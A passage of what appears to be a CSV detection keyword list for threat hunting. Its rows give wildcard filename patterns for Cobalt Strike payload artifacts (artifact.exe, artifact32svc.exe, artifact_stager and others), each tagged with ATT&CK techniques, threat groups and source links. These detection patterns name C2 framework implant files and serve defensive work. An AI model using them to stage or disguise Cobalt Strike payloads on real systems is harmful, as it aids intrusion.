- T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*artifact.cna*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*artifact.exe*","offensive_tool_keyword","cobaltstrike","default articfact name generated by cobaltsrike Cobalt Strike is threat emulation software. Execute targeted attacks against modern enterprises with one of the most powerful network attack kits available to penetration testers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*artifact.x64.exe*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*artifact.x86.dll*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*artifact.x86.exe*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*artifact_payload*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*artifact_payload*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*artifact_stageless*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*artifact_stageless*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*artifact_stager*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*artifact_stager*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*artifact32*.exe*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*artifact32.dll*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*artifact32.dll*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*artifact32.exe*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*artifact32.exe*","offensive_tool_keyword","cobaltstrike","default articfact name generated by cobaltsrike Cobalt Strike is threat emulation software. Execute targeted attacks against modern enterprises with one of the most powerful network attack kits available to penetration testers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*artifact32big.dll*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*artifact32big.exe*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*artifact32svc.exe*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*artifact32svcbig.exe*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*artifact64*.exe*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 